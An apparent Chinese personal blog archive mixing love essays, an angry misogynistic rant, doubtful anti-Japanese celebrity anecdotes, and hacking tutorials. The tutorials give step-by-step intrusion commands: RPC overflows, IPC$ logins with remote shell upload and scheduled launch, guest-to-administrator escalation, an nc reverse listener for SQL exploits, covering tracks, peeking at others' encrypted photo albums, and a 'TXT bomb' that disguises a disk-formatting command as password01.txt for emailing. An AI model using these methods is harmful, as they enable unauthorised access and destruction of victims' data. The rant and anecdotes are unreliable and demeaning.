April 23
曾经的你问我哪里对你好,我一时想不起来,经过这长时间的思考,我终于想到如下这些我对你好的地方:
没认识你之前我拿奖学金,认识你之後我考试补考。没认识我之前你补考,认识我之後你拿奖学金。
我忍着让别人笑话的耻辱自己洗衣服。
一个苹果,都给你吃,两个苹果,我把大的给你吃。
同吃一条鱼,我让你吃大身,我自已吃鱼头。
你这麽难看,我还说你漂亮。我这麽帅,你还说我难看。
出去玩都是我花钱,回来我只能吃萝卜。(你省下钱当然可以自已吃鱼翅了)
你生气时,我让你当出气筒。我生气时,我把自已当出气筒。
你想吻我的时候就可以吻我。我想吻你的时候还要经过你同意。
你经常掐我咬我,我从来没打过你。
有一次你问我如果你爱上别的男人了我会怎样,我说我要杀了那个男的。我又问你如果我爱上别的女人了你会怎样,你说你要阉了我。
你生病一次,我要瘦两斤,我生病一次,你反而胖两斤(你来寝室陪我,吃光了我所有的零食)
我没嫌你矮,你却嫌我高。
那次去看露天演唱会,你骑在我头上看得津津有味,我被你压在下面在人群中流泪。
我家的狗生了,我可以把最好看的一条送给你。你却把你养得快要死掉的金鱼送给我,害我? ~养两天就得给它们送终。
如果相爱只是一瞬间的感动。。那么,我愿意用一生的守侯来换你的一瞬间。。。遇见你是今生的缘分,爱上你是今生注定的,陪着你在今生今世里。 我这样爱你到底对不对,这样的问题问得我好累,我宁愿流泪也不愿意后悔,可我害怕终于还是要心碎。
看着窗外两点四落散,回想过去还是会心痛曾经那么疯狂。。。。
January 22
生活有時陰差陽錯,你錯過了一時,就似乎錯過了一生。
有個男孩,在學校的新生聯歡會上認識了一個女孩。女孩笑如春花,聰明活潑,男孩對她幾乎是一見鍾情,卻沒有表露。因爲男孩剛經過高中階段循規蹈矩式的教育,對男女感情小心翼翼得令人難以置信,他想:“再等等吧,等一切成熟些,再向她說。”
一年多後的一個夜晚,男孩終於鼓足勇氣約女孩出來,向她表達了心中的愛意?沒想到,平時伶俐的女孩結結巴巴地說:“我……我想我不能接受……你的好意,一個星期以前……我已經……接受了另一個……男孩……我真的……不知道你……會喜歡我……”女孩說完就跑掉了,沒有讓男孩看到她濕潤的眼。
後來,有人看到男孩同學校的“校花”經常出雙入對,大家都以爲他看中了“校花”的美貌,誰也沒有注意,“校花”有著和女孩一樣的春花般的笑容,非常相似,所以誰都沒有發現男孩的苦心。但是沒過多久,男孩與“校花”的愛情就以分手告吹。
大學生活很快就結束了。畢業後,女孩披上了嫁衣成了別人的新娘,而男孩再沒有戀愛過。因爲他清楚,只有這個女孩才是他今生唯一的至愛。
男孩從朋友那裏輾轉打聽到女孩的生日和地址,每到女孩生日時,他就會叫人送去九朵郁金香(他不知道女孩最喜歡什麽花,他自已最喜歡郁金香)。男孩知道女孩已爲人婦,所以他從來不在卡片裏留下姓名和聯繫號碼,他不想因爲自已的感情而影響女孩的生活。
幾年時間轉眼就過去了,男孩依然是形隻影單,依然記得每年都送花給女孩。就在女孩生日的前兩天,男孩參加了一個同學聚會,他聽說女孩在這幾年裏經歷了兩次離婚,如今也是獨身,心裏又是心疼又高興?他爲女孩遭遇了感情的不幸而心疼,又爲自已再次有了機會而高興……
終於等到了女孩的生日!男孩興奮得難以言狀!他想這次一定要親自把花送去,再向她表白。爲此,他幾乎逛遍了所有的花店,最後挑選了最美的花朵郁金香。
當小姐把花包紮好的刹那,男孩在卡片裏寫下幾個字:你知道我在愛你嗎?!男孩英俊的臉上灑滿了笑意與渴望,逕直向街心走去……
就在那時,一輛逆行貨車撞倒了他……
女孩在收到郁金香的同時也收到了男孩的死訊。
女孩明白了一切,她把自已鎖在了房間裏哭了整整一夜。她回想起多年前的那個夜晚,男孩對她的表白?她一直不知道 ,這近10年來,男孩是如此執著而癡迷地愛著她!想到這裏,她就哭得更傷心,奔瀉的淚水將郁金香浸染得無限淒美。女孩知道,她失去了今生難遇難求的至愛。
然而,長眠的男孩肯定也不知道,女孩最喜歡的,正是郁金香啊……
☆爱☆
这篇文章写的很感动人
也许故事是真的
我想
绝对没有什么命运不命运的
命运都是把握在自己手中
任何事情都不是绝对的
所以如果真的喜欢
那就勇敢去追吧
不要等错过了才后悔
我也是
我在考虑我将来应不应该结婚
我是一个喜欢玩的人
喜欢自由却厌恶孤独
有点好笑
我被女人伤到了
在愤怒时我发现49大哥的一篇文章
原文如下:
有些女人是守不住的
现在是你的 将来不是你的
现在看起来觉得是你的 其实真的不是你的
女人啊 柔情似水
所以也像水一样善变
女人 总是不能让人放心的
人嘛 都是会装的
尤其女人 天生的表演高手
明明自己穿的勾引你
当你真的被勾引了的时候
她会说你流氓
其实也就是为了用你的流氓来对比显示自己的纯洁
你成了他故事里的配角 还被糟蹋的一塌糊涂
所以你不能太入戏
该走的时候还是要走 该操的时候也不要含糊
女人拽 照样甩
不要留恋一个根本就不值得你留恋的人
也不要恨
恨是因为你还在爱着
谁会为一个不再在意的人费尽心思
所谓的恨不过是爱在另一个极端的表达形式罢了
也别刻意的让爱不到身边
伤口总要有愈合的一天
幸福的来去不知不觉
别因为一个错 错过了所有的对
像拿钥匙开门一样 Y的不对 咱换个门
如果你一直等着 就是你傻了
整个春天不只一朵花
洒脱点
关于爱情 是一种病
有人病的忧伤 有人病的健康
但总归是病
不去医院看的时候所有人都没病
去医院看 啥病都出来了
爱情也是
不去追究 现在就很好
细细追究 Y的什么是爱情 什么是婚姻
爱情就是在一条寂寞的路上 大家都怕寂寞
男:哎!一起走好吗?
女:好的!
一旦有个人要拐个弯 问下个人的还是同样的问题
所谓天长地久就是共同走的那一段而已
婚姻 本质而恶心的说
就是长期的免费卖淫!
哎~~~
守不住的 就珍惜现在吧
走的时候记得说 那就这样吧!
守的住的 就结婚吧
走的时候记得说 你下辈子要经过哪个路口?
============================================================
气愤中写的东西难免带有偏见,发泄下,如果伤害你了我向你们道歉!
============================================================
文章写出了心里话
反正我现在气愤
气愤时就是这么认为的
同样
气愤中写的东西难免带有偏见,发泄下,如果伤害到你了我向你们道歉!
(完)
January 10
google是个大公司,本应该积极向上,努力为用户服务才对!但是最近的更新版本的确存在着很多问题,不仅会对用户的电脑造成伤害,甚至已经违反了用户的基本权益!用过迅雷和电驴(emule)的朋友应该知道在它们的设置选项里都有“监听端口”和“磁盘缓存”这两项。一直很天真的我以为把“监听端口”和“磁盘缓存”这两项关掉就没事了,但是我发现他们在p2p上传中,占用了很大一部分带宽,并且这部分带宽不是由用户决定的,这也是迅雷和电驴(emule)侵犯用户权益的所在。是在用户不知情的情况下将用户隐私文件和iP暴露给外界,如果让黑客利用了......看这些东东让你受累了....以下图片是我使用Googlemail的记录,欣赏一下吧~
December 13
1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦.恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使用!! 注意: 千万不要破坏别人的软体或资料!!
2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的后将它改回原状.
3. 不要轻易的将你要 Hack 的站台告诉你不信任的朋友.
4. 不要在 bbs 上谈论你 Hack 的任何事情.
5. 在 Post 文章的时候不要使用真名.
6. 正在入侵的时候, 不要随意离开你的电脑.
7. 不要侵入或破坏政府机关的主机.
8. 不在电话中谈论你 Hack 的任何事情.
9. 将你的笔记放在安全的地方.
10. 想要成为 Hacker 就要真正的 Hacking, 读遍所有有关系统安全或系统漏洞的文件 (英文快点学好)!
11. 已侵入电脑中的帐号不得清除或修改.
12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须维持原来系统的安全性, 不得因得到系统的控制权而将门户大开 !!
13. 不将你已破解的帐号分享与你的朋友.
14. 不恶意破坏任何系统,这样做只会给你带来麻烦。恶意破坏它人的软件或系统将导致法律刑责,如果你只是使用电脑,那仅为非法使用!!注意:千万不要破坏别人的软件或资料!!
15. 绝不修改任何系统文件,除非你认为有绝对把握的文件,或者要改那些文件是为了使你自己在以后更容易的再次进入这个系统而必须更改的。
16. 不要将你已破解的任何信息与人分享,除非此人绝对可以信赖。
17. 当你发送相关信息到BBS(电子公告板)时,对于你当前所做的黑事尽可能说的含糊一些,以避免BBS受到警告。
18. 在BBS上Post文章的时候不要使用真名和真实的电话号码。
19. 如果你黑了某个系统,绝对不要留下任何的蛛丝马迹。(绝对不要留下大名或者是绰号之类的,这时由于成功的兴奋所导致的个人过度表现欲望会害死你的。)
20. 将你的黑客资料放在安全的地方。
21. 想真正成为黑客,你必须真枪实弹去做黑客应该做的事情。你不能仅仅靠坐在家里读些黑客之类的文章或者从BBS中扒点东西,就能成为黑客,这不是“黑客”的真正含义 。
想必大家都为网上的病毒和木马头疼,如果大家使用的是windows 2K 或Windows XP的话。今天就教大家一招金蝉脱窍。而且只需要这一招克就能死所有病毒!
如果你是新装的系统(或者是你能确认你的系统当前是无毒的),那就再好不过了,现在就立即就打开:
“开始→程序→管理工具→计算机管理→本地用户和组→用户”
首先就是把超级管理员密码更改成十位数以上,然后再建立一个用户,把它的密码也设置成十位以上并且提升为超级管理员。这样做的目的是双保险:如果你忘记了其中一个密码,还可以使用另一个超管密码登陆来挽回,免得你被拒绝于系统之外;再者就是网上的黑客无法再通过猜测你系统超管密码的方式远程获得你系统的控制权而进行破坏。
接着再添加两个用户,比如用户名分别为:user1、user2;并且指定他们属于user组,好了,准备工作到这里就全部完成了,以后你除了必要的维护计算机外就不要使用超级管理员和user2登陆了,只使用user1登陆就可以了。
登录之后上网的时候找到ie,并为它建立一个快捷方式到桌面上,右键单击快捷方式,选择“以其他用户方式运行”点确定!要上网的时候就点这个快捷方式,它会跟你要用户名和密码这时候你就输入user2的用户名和密码!!!
好了,现在你可以使用这个打开的窗口去上网了,可以随你便去放心的浏览任何恶毒的、恶意的、网站跟网页,而不必再担心中招了!因为你当前的系统活动的用户是user1。而user2是不活动的用户,我们使用这个不活动的用户去上网时,无论多聪明的网站,通过ie得到的信息都将让它都将以为这个user2就是你当前活动的用户。
如果它要在你浏览时用恶意代码对你的系统搞搞破坏的话根本就时行不通的,即使能行通,那么被修改掉的仅仅是use2的一个配置文件罢了,而很多恶意代码和病毒试图通过user2进行的破坏活动却都将失败,因为user2根本就没运行,怎么能取得系统的操作权呢?既然取不得,也就对你无可奈何了。
而他们更不可能跨越用户来操作,因为微软的配置本来就是各各用户之间是独立的,就象别人不可能跑到我家占据我睡觉用的床一样,它们无法占据user1的位置!所以你只要能保证总是以这个user2用户做代理来上网(但却不要使用user2来登陆系统,因为如果那样的话,如果user2以前中过什么网页病毒,那么在user2登陆的同时,他们极有可能被激活!),那么无论你中多少网页病毒,全部都将是无法运行或被你当前的user1用户加载的,所以你当前的系统将永远无毒!
不过总有疏忽的时候,一个不小心中毒了怎么办???
不用担心,现在我们就可以来尽情的表演脱壳的技术了!
开始金蝉脱壳:
重新启动计算机,使用超级管理员登陆——进入系统后什么程序都不要运行。
你会惊奇的发现在的系统竟然表现的完全无毒,那就再好不过了,现在就立即就打开:
“开始→程序→管理工具→计算机管理→本地用户和组→用户”
把里面的user1和user2两个用户权删掉吧,你只需要这么轻轻的一删就可以了,那么以前随着这两个用户而存在的病毒也就跟随着这两个用户的消失而一起去长眠了——(好象是陪葬,呵呵!)。这么做过之后我保证你的win2k就象新装的一个样,任何系统文件和系统进程里都完全是没有病毒的!
好!现在再重复开始的步骤从新建立user1和user2两个用户,让他们复活吧。他们复活是复活了,但是曾跟随了他们的病毒却是没这机会了,因为win2k重新建立用户的时候会重新分配给他们全新的配置,而这个配置是全新的也是不可能包含病毒的!!!建立完成之后立即注销超级管理员,转如使用user1登陆,继续你象做的事吧,你会发现你的系统如同全新了。
以上方法可以周而复始的使用,再加上经常的去打微软的补丁,几乎可以永远保证你的操作系统是无毒状态!只要你能遵循以下几条规辙:
一、任何时间都不以超级管理员的身份登陆系统——除非你要进行系统级更新和维护、需要使用超级管理员身份的时候或是你需要添加和删除用户的时候。
二、必须使用超级管理员登陆的时候,保证不使用和运行任何除了操作系统自带的工具和程序之外的任何东西,而且所有维护都只通过开始菜单里的选项来完成,甚至连使用资源管理器去浏览硬盘都不!只做做用户和系统的管理和维护就立即退出,而决不多做逗留!(这也是微软的要求,微软最了解自己的东东,他的建议是正确的。浏览硬盘的事,在其他用户身份下你有大把的机会,在超级管理员的身份下还是不要了!这应该事能完全作到的)。
如果上面的都做到了,那么排除了硬件和误操作原因、病毒跟系统瘫痪都将与你彻底无缘了。
第一步-打开IE-工具-IE选项-删除文件F-删除COOKISS-打开设置-查看文件夹
第二步-打开相册-在刚才打开的文件夹里点击刷新,然后找到一个文件名为
cgi_qqzone.cgi的文件.打开他-看到一些代码...然后就按Ctrl+F
输入相册的名字<比如加密相册叫:我的照片....则输入"我的照片" >
按两次 查找下一个...然后在下面点击看到一个http://开头和一串数字结尾的连接就是加密相册的图片拉,复制到
IE上就可以看到对方加密的照片
其实,利用IE可以读很多加密的文件,大家可以通过我上文的方法充分想象.......只有想不到的,没有做不到的!
手工写.reg注册表文件
这是修改注册表的高级技巧了.有没有试过自己写注册表文件?不用任
何修改器?直接把写好的注册表文件——.reg导入注册表?
现在我们来看看.reg文件的结构如何。
.reg文件的标准格式如下:
REGEDIT4
[路径] (注意用大小写)
\\键名\\=\\键值\\ (针对字符串型键值)
\\键名\\=hex:键值 (针对二进制型键值)
\\键名\\=dword:键值 (针对DWORD键值)
括号里面的内容为本人的注释,写文件的时候就不需要那些小括号
了,其他上面所列的都必须包括。注意引号输入时不能用中文输入的
引号,必须用英文的引号,否则会出错。
那么,怎么写.reg文件呢?我们需要一个文本编辑器,用windows的记
事本就可以了。单击鼠标右键,选择新建文本文档,然后在生成的文
本文件里输入上面规格的内容就可以了,最后,选择另存为,输入你
想要的文件名+.reg保存即可。比如你要生成test.reg,输入test.reg
保存即可,你可以看到生成了一个带图标的test.reg.双击运行这个
test.reg文件就能相应的修改注册表了,系统会提示“是否导入注册
表”之类的信息,确定就可以了。OK,我们可以手动写注册表了。
先别急,我们来看看一个标准范例,这是从注册表里面导出来的,大
家慢慢学习,跟着模仿一下就能写出自己的.reg文件了。
REGEDIT4
[HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\
Policies\\\\Explorer]
\\NoRun\\=dword:00000000
\\NoRecentDocsMenu\\=hex:01,00,00,00
\\NoFavoritesMenu\\=dword:00000000
\\user\\=\\sundrink\\
大家可以看到,dword是16进制,hex是二进制,字符串则可以直接赋
值。只要将上面的内容复制保存到文本文档里,然后另存为你想要
的.reg文件运行就可以了。呵呵,原来也不是很难嘛,耐心一点就可
以了。当然,你要模仿,要自己动手写.reg文件,用记事本就可以
了。
多说两句,为什么要手写注册表?因为有时候我们会碰到一台锁定
regedit的机子,有什么办法解开呢?呵呵,如果你会手写注册表文件
的话,那很简单了......大家发挥想象吧!用不了很长时间的。
最后在文章结尾,提醒大家,注册表修改可不是闹着玩的,其中有些
键值是不能随便改的,因为如果你没有备份,而又不知道怎么改回来
的话,那就麻烦了,我也帮不了你。所以奉劝各位在修改注册表之前
一定要记得备份,切记!
下面我就将TXT炸弹的制作方法教给大家:
1.创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。
2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后点击“浏览”按钮选择要插入的文件。
3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”。在弹出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令:start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示出命令内容。
4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一个图标。
5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名称)。点击“文件”菜单中的“更新”,然后关闭此对话框。
6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默认名为"片段"),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作为附件发出。
7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对
象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换为:start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文件(盘符根据实际情况自定义);如果替换为:start.exe /m deltree /y c:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件.(当然大家可以改成其它的命令)
真的很简单,就这样一个恶意的攻击程序被弄出来了,太可怕了!
(切记:仅供学习与研究,切莫用来攻击他人,更不要在没有安全准备的情况下执行上面的文件,呵呵!)
December 10
刘翔 在10届全运会上刘翔冲刺的一刹那,大家看到运动员身上所穿服装的标志,是日本货─美津浓(全运会服装的唯一指定商)。刘翔却用黄色胶带把运动背心和短裤上的商标贴的死死的。国家体育总局必须让穿日本货,刘翔作为国家培养出的运动员他没有反对,可他作出的聪明之举更体现了他抵制日货的决心。事实上,刘翔确实是很恨日本的。都说姚明拒绝丰田汽车的广告,事实上,刘翔也已经拒绝了好几单日本产品的广告邀请,对方开出的价码甚至比耐克和可口可乐还高,可以说是天价(在日本有不少刘翔的拥趸,日本每年都盛情邀请刘翔参加日本横滨的田径精英赛),但刘翔都拒绝了。
刘翔做广告有三个原则,这只在刘翔父亲,孙海平等极少数几个人之间保持相互默契:1.必须是有实力,有品牌的大公司。2.如果是外国企业和民族企业两家竞争,优先考虑后者。第三条凌驾于第一条和第二条之上,作为刘翔接广告的第一准则,那就是:所有关于日本的广告一律不接,不管开价多少。
黄子华 令人肃然起敬的香港明星黄子华:在第23届香港电影金像奖颁奖典礼上(全球现场直播),主持人黄子华对前来领最佳亚洲电影奖的原岛大地说了一句震惊全场的话:“回去之后别忘了告诉日本人,钓鱼岛是中国的!!!!”
姚明 大家都知道丰田汽车找姚明拍广告的事吧,但你知道丰田为占领中国市场愿意出多少广告费吗?丰田最终出到了2000万美元,相当于1亿6000万多人民币,姚明的反应是什么?
日本丰田公司几次三番找到火箭队的老板亚历山大,目的只有一个,希望他帮忙跟姚明牵上线,让姚明出任丰田的形象代言人。丰田公司一直是火箭队的球场赞助商,火箭队的主场球馆就叫“丰田中心”,所以,老板自然也愿意成全这桩美事,更何况,谁都可以想象,丰田公司在开始行动之前,已经为姚明准备了一份多么丰厚的广告同。但是,结果出乎所有人的意料,姚明几乎没有任何商量的余地,就是两个字:不行。而且,不提供任何解释。不知出任日本企业形象代言人的其他明星做何感想 .
刘德华 7月5日,刘德华一行来到日本,举办了小型歌友会。歌友会一开始,歌迷欢呼。但是刘德华拒绝用日语向大家问好。接着又拒绝了主办方安排的日语歌曲。并把所有曲目都改为普通话。原定的粤语歌曲也全部取消。
刘德华用普通话一字一句说道:“本来我是不想来日本的,但是因为合约在身,不得不来日本。但是你(指记者)不要以为是一纸合约把我牵住的,如果我不来,没人可以把我怎么样。我只是觉得这样对我歌迷不公平,因为歌迷是无辜的。我不想做的事,谁也无法逼我做,而且,你逼我,我也不会做”。
刘德华接着说:“引用一句话,艺术是没有国界的,但是艺术家是有国界的。我想说,音乐是没有国界的,但是音乐家是有国界的。”他对着主办方说“以后介绍我时,不要说我是香港歌手,因为我首先是一个中国人”。
然后,他当着几百名日本歌迷的面,演唱了一首《中国人》。
李连杰 一次发布会,现场大家谈到“南京大屠杀”。在座的一个日本女记者就问到蔡依林,你们中国人老说被杀了30W,难道你们有数过啊。
蔡依林有些尴尬,李连杰当即抢答:“我们是没数过,难道你们日本妇女被美国大兵强奸过后,你们还要去问她是否有快感?”
张学友 张学友在1997年香港回归的时候,与刘德华,张国荣等香港娱乐圈内人来大陆做宣传.在场有一位日本记者在采访张学友的时候问道:"张学友先生,你们香港回归中国后,你们是对回归有什么看法?有些人说你们香港娱乐圈的人向来是反对回归中国的,是吗?"
张学友微微一笑,说:"我只会唱歌,不会参与政治,但我知道身为一个本国人应该做什么,香港当时是被英国侵占的,但领土和人都还属于中国,我们中国人知道自己应该做什么.如果你们日本人存在有辱国耻的思想,那么难免误会除了你们日本人之外,还有别的国家也会这样.你问这些话理所当然."
成龙 2005年成龙作品神话出品后,成龙在韩国做宣传,一个日本人挑衅的问道;"成龙先生,您以前几乎一直在好莱坞打拼,为什么又回到国内发展?是不是因为您在好莱坞不景气?"
成龙一愣,随即回答说:"我是一个中国人,永远也不会忘本,在好莱坞打拼如何也不仿碍我在国内发展,我们中国人不像有些国家,因为一部电影在好莱坞略有影响就改了美国籍(这明明指出是日本的一个演员),像我,李连杰,杨紫琼等不管在好莱坞发展如何都会回到国内献给影迷们一些作品,这是我们中国人的品德.而不是有些国家(再一次的讽刺日本国).
我觉得:
我们绝对有必要正确面对.这不是政治.这是我们这一代年轻人的想法,也是全国必须面对的,我们必须是统一的.我认为我们必须抵制日货,大家或许不知道.日本已经送中国一个大礼了:日本单方面宣布钓鱼岛属于日本.这说明什么.当我们这一代还在因为一件衣服,一个游戏,那家饭菜好吃的时候,中国已经一点点的消失了,我决不是危言耸听,在近十几年里.没有一个中国人能靠近过我们的领土:钓鱼岛,甚至还有爱国人士用生命捍卫了尊严,大家或许认为我说的还是政治,不是政治,而是尊严,一个国家不能没有尊严.日本的强大也是因为他们有统一的民族尊严,不要把一些国家想的太过美好,希望大家能够真的做些什么,只要我们抵制日货,不仅我们的国家工业经济能够振兴,还有就是我们国家的整体地位.日本,中国人民永远也不会忘记我们的仇恨,永远不会忘记,我们的祖先用鲜血和生命换回的土地!永远会守护我们的祖先用鲜血和生命换回的土地!我们要团结起来,一致对外!日本人有什么值得我们原谅的,日本有什么资格讽刺中国?
December 09
1.思路:突破XP系统远程访问的限制,实现文件传输和远程登陆。
2.工具:RPC漏洞扫描工具,溢出工具,pstools工具包。
3.步骤
一:RPC漏洞扫描:
推荐使用retinarpcdcom.exe
二: 远程溢出:
在剑鹰网络安全小组有很多改类工具下载,我用xp.exe,溢出成功率极高。
三:提升guest权限
命令:net user guest /active:yes
net localgroup administrator guest /add
因为guest有与其他所有帐号不同的特性。
如果你可以用net user guset命令,将会看到下面帐户不同的内容:
password required NO
这正是xp系统远程访问帐号限制的突破口!
除了guest外,其他帐号都是
password requered yes
所以就算你有xp系统的管理员帐号密码一样无所作为。
当guest提升为admin权限后,你试试
dir \\ip\c$Content$nbsp;
现在你就有了读写权限,连ipc$连接都省了。
当然你也一样可以用net use \\ip "" /user:"guest"来进行ipc$连接。
四:远程登陆
我们当然不想每次溢出登陆对方了。
那么就试试opentelnet吧
>opentelnet \\ip guest "" 1 90
read ntlm failed
上传srv.exe试试,因为我认为用psexec方便多了。命令如下:
psexec \\ip cmd
五:关于后门
各种神通,我正好用来试试容哥的bits.dll感觉不好。
六:注意事项
千万别在xp系统中建立新帐户。
xp系统默认只能登陆一个帐户,故用3389远程登陆是不行的。
RPC溢出会导致对方重启,要慎用,尤其是服务器
1. 1433端口入侵 scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。 2. C:\>copy srv.exe $">\\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time file://127.0.0.1/
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at file://127.0.0.1/ 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
5. C:\>net time file://127.0.0.1/
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活
11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
Tools 
Help
